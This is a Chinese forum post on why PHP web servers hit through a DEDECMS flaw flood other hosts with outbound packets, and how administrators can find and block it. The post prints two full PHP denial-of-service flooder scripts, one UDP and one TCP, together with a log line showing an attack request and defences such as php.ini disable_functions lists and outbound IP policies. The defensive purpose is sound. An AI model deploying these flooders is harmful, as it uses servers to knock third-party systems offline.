找回密码
 加入怎通
查看: 1608|回复: 4

[原创] 服务器php对外发包引起崩溃的解决办法

[复制链接]
商摆小路 发表于 2012-06-12 13:06:58 | 显示全部楼层 |阅读模式
  服务器php对外发包引起崩溃的解决办法paopao最近老听人说,php对外发包,引起服务器崩溃或被机房查封,今天闲着无事和大家一起分享paopao我总结的DEDECMS php对外发包引发服务器崩溃的终极解决方法,希望可以帮助大家解决服务器问题,让网站运行的更好
' a8 G% {8 ^' X1 O* G0 F- [  一。php对外发包分析7 o9 _3 M$ G- m  |$ i
  用php代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:
' K: C# u% t7 L2 f# ^1 Z  以下是代码片段:/ P0 k; ^' H% t2 Q/ y: N$ G( |) v
  $packets = 0;/ j+ Z' c. H+ I4 _
  $ip = $_GET[\'ip\'];8 o$ b2 P- n' h- ~
  $rand = $_GET[\'port\'];
9 p3 w7 j/ r4 N+ A, t  set_time_limit(0);6 c8 N* Y2 T* ^
  ignore_user_abort(FALSE);
6 f/ b0 T! f) o) T  $exec_time = $_GET[\'time\'];sbxl-201206125 m& u6 i* [$ Z$ U- s/ I
  $time = time();' M; u2 R' ^8 X5 M2 {
  print \'Flooded: $ip on port $rand
# S  u8 E, e- m/ R3 z" t2 M  _  \';2 n0 u3 i9 c- ?4 O0 C
  $max_time = $time+$exec_time;5 x! R( L: Q. Z: x2 W
  for($i=0;$i<65535;$i++){
& R" V8 Y2 P. ?* V) R+ e0 L  $out .= \'X\';
4 L) v+ w2 Q5 m' q+ h$ C2 c# ]2 n  }/ p: I4 _5 A( @6 A4 q: Z( c( I8 l- c/ Z
  while(1){
3 G# n3 r  x( ~) r3 Q' @  $packets++;, e% X7 j  P& }0 o. ~  i
  if(time() > $max_time){
6 n9 T  z% ~" l6 I  break;
# F7 m. W+ ]# G# l  }
! P/ P! g; e2 u% l( U% b  G  $fp = fsockopen(\'udp://$ip\', $rand, $errno, $errstr, 5);5 ~' O' u! u+ P
  if($fp){
4 S% H" E9 Q/ `  fwrite($fp, $out);
/ B" ^' ?$ |6 ^7 |, f4 T  fclose($fp);9 U6 k2 d; L) j0 @. c/ U- R# l; x
  }& _3 P% k0 e( k4 ?" k: Q% _
  }& x' f: x1 f8 J
  echo \'Packet complete at \'.time(\'h:i:s\').\' with" B; F- F/ f, T; k
  $packets (\' . round(($packets*65)/1024, 2) . \' mB) packets averaging \'.
- Y8 E) d& m6 v% k9 }: h! r  round($packets/$exec_time, 2) . \' packets/s ;+ B+ r4 i& E. K* |2 L
  ?>* [3 V( Z5 p3 l- X9 Y4 J
  二。表现特征
. ]9 i7 S( z$ j- X9 P  一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是服务器不断收到大量数据包./ `4 d0 x: D- k1 v, ~5 \4 D* Q! F( J
  近期由于DEDECMS出现漏洞而导致大量服务器出现这个问题.
  J- v2 j% v, j& b. {  如何快速找到这些站?
* X$ j$ a# t- s% M  你可以打开日志
( U) I. l! g- ]4 }( v# r  C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打开今天时间的文件,4 e4 S. F1 X, r$ \! T. ]) O5 ]
  里面有类似这样的记录:
+ ?  u+ B# {+ }5 }  2012-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1
9 Q$ H/ k. I# o( l3 ^  最后三项783 Disabled 30_FreeHost_1- \7 P0 d* T% g* T: I; H
  783就是这个站在IIS中的ID$ ~2 T8 A4 E7 r, o1 m4 \
  30_FreeHost_1就是所在池9 p! ]: V+ j1 o  G# ?
  三?解决办法
' v) `  n" g% \  1.按上述找到这个网站后停止它.或停止池,并重启IIS.- n( Q& G) ^9 q* O4 z
  2.在IP策略,或防火墙中,禁止所有udp向外发送/ X; c2 d6 ~( O0 O! b. \1 l' s$ u  o
  在星外最新版本的安全包中,已带有4.0版本的IP策略【下载safe包】,您导入后就直接可以限制了外发的UDP包?下载这个包,之后导入安全策略?但这个策略并没有关闭DNS端口,部分攻击还是有效.0 v7 F1 _! q. a9 ]
  为了解决这个问题,你也可以调整IP策略,限制udp只能访问特定的DNS服务器IP,如8.8.8.8,除非黑客攻击这个IP,不然攻击也是无效的,你可以在网卡DNS中设置一个你才知道的DNS IP,并且不要公开,然后调用IP策略中的udp open部分就可以解决.(打开IP策略的属性,双击open,将open中的两条udp记录删除任意一条,在保留的这条中,双击,改成 地址 从源地址 任何地址 到目标地址'特定IP 这个IP就是设置为你自己的DNS IP,如8.8.8.8' 保存后就行了)3 j' Y" Q% W% L8 j$ y
  在2011-4-27,我们上传了新的安全包,里面有一个'星外虚拟主机管理平台IP策略关闭所有UDP端口用.ipsec'文件,您可以导入它并启用,就可以关闭所有udp端口,就可以完全防止这类攻击,但是,这个策略由于关闭了DNS端口,会造成的这台服务器上无法用IE访问任何域名,因此,用户的采集功能也就用不了.(同样,如果在主控网站上用了这个策略,就会造成的受控自检不通过,因为解析不了域名,另外,部分用户反映此策略会造成的mysql不正常)
9 A9 g$ f! Y& C  r' a  3.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词(其他关键词可以删除.)* P! w0 E' r0 W5 b+ @3 k* I
  4.也可以直接禁止上面的代码,如改win\php.ini后重启IIS
$ [4 R  d* r( N  ignore_user_abort = On
) @9 o% o/ |6 B7 c1 m, K+ q  (注意前面的;号要删除)
  E' x2 X+ J7 e  disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
7 d4 N2 \8 {; H% r# x  在后面加上. t) X4 Q2 {; |. T4 T2 f+ {
  fsockopen,set_time_limit& B* z. `: b  u5 q
  但这样会造成很多php程序都不正常.
+ B4 P$ E3 x# Z- m9 _  另外,这也表明你的服务器安全做得不错,如果能入侵.黑客就直接提权了,还DOS做什么?- W8 A; A1 s1 H. R0 P
  近期已有新的基于TCP攻击的PHPDDOS代码如下:) I! `% l( c$ k7 m
  以下是代码片段:7 J# X. N7 [9 j* z
  set_time_limit(999999);
! e  t% Z) K3 w/ d8 G& @  $host = $_GET['host'];
, F+ X" ]3 u! T* s6 o  $port = $_GET['port'];
4 m5 O- Q7 [) a5 [6 S- r. Z2 M  $exec_time = $_GET['time'];' s0 w( _# {4 S8 ?. l9 a8 o
  $packets = 64;# F* X( g4 |7 @# c! Z! P2 I: l! a
  ignore_user_abort(True);
: O& q7 G+ ~  x0 J  if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
/ W7 \& ?/ m- J+ H/ }, `/ Z  if (StrLen($_GET['rat'])<>0){) `2 O3 \' b1 c8 m: S7 w
  echo $_GET['rat'].$_SERVER['HTTP_HOST'].'|'.GetHostByName($_SERVER['SERVER_NAME']).'|'.# ~: Z, H" C5 d; m, R* e+ m
  php_uname().'|'.$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
4 |+ h0 Y8 h& i  exit;) d2 N7 Q8 L1 q+ M
  }
1 ^" s- F: E7 ]0 \( d  exit;( ?1 [" F$ p2 b5 h1 J
  }; Y8 a% {5 e0 |  w3 m4 a- C$ _
  $max_time = time()+$exec_time;
* Q2 r9 E6 G; ?2 {  while(1){
# k3 K* O7 ?  w# r  $packets++;* N9 j% ?! |# K
  if(time() > $max_time or $exec_time != 69){
7 x* S5 b) g6 L1 V7 g  break;
* e0 T" N; [2 }; _' U  }
  V; p- \8 g* q! |/ e6 F  $fp = fsockopen('tcp://$host', $port, $errno, $errstr, 0);; \! ^/ F9 ^( S, N9 z* z5 W0 v) {: ?
  }, c; M! {( Y0 e
  ?>, N- |. |, E4 _
  同样,可以采有以下解决办法:
* a3 [% \+ `0 z' y8 c  D3 K7 ]( t1 Z  1.也可以直接禁止上面的代码,如改win\php.ini后重启IIS
- j6 T3 {$ w7 D4 s$ o1 P  ignore_user_abort = On; `$ [' R$ a$ P
  (注意前面的;号要删除)* {6 S( Y8 i; s6 l- H
  disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,2 o6 n& H$ e, s
  在后面加上
' v" J9 b; D1 N# f" `  fsockopen,set_time_limit
' R  u; b1 ~' Y) Z6 M  b$ J  但这样会造成很多php程序都不正常. 如果您是IDC,给客户提供空间的,禁用函数可能导致客户程序无法运行,所以一般不要用此办法. K, _, {) ^8 V( `$ T, @
  2.在IP策略中禁止所有外访的TCP数据包,但这样会造成的采集功能无效,也不能用在主控服务器上?! N: ?! o! q0 t- l$ _0 M
  3.在服务器要用关键词tcp:或udp:搜索所有php类文件,找到攻击文件,删除它?, X3 t3 I' E+ R
        文章出自医院网站优化 http://www.ahyyqing.com,转载请注明出处。, B2 D1 N& a% J7 T* R) F

评分

参与人数 1ZZ币 +40 收起 理由
TONY + 40 这个很受用,我们也遇到了这个问题!

查看全部评分

回复

使用道具 举报

TONY 发表于 2012-06-12 13:39:53 | 显示全部楼层
很好 感谢分享啊
回复 支持 反对

使用道具 举报

幸福的蚂蚁 发表于 2025-11-10 20:26:34 | 显示全部楼层
分析得很透彻,很多细节都说到点子上了~
回复 支持 反对

使用道具 举报

DAIV 发表于 2026-02-17 01:26:21 | 显示全部楼层
楼主太厉害了,整理得这么详细,必须支持
回复 支持 反对

使用道具 举报

286888037 发表于 2026-03-31 17:08:47 | 显示全部楼层
完全赞同,我也是这么认为的,英雄所见略同~
回复 支持 反对

使用道具 举报

    您需要登录后才可以回帖 登录 | 加入怎通

    本版积分规则

    QQ|手机版|小黑屋|网站地图|真牛社区 ( 苏ICP备2023040716号-2 )

    GMT+8, 2026-6-12 14:48 , Processed in 0.030574 second(s), 29 queries , Gzip On.

    免责声明:本站信息来自互联网,本站不对其内容真实性负责,如有侵权等情况请联系420897364#qq.com(把#换成@)删除。

    Powered by Discuz! X3.5

    快速回复 返回顶部 返回列表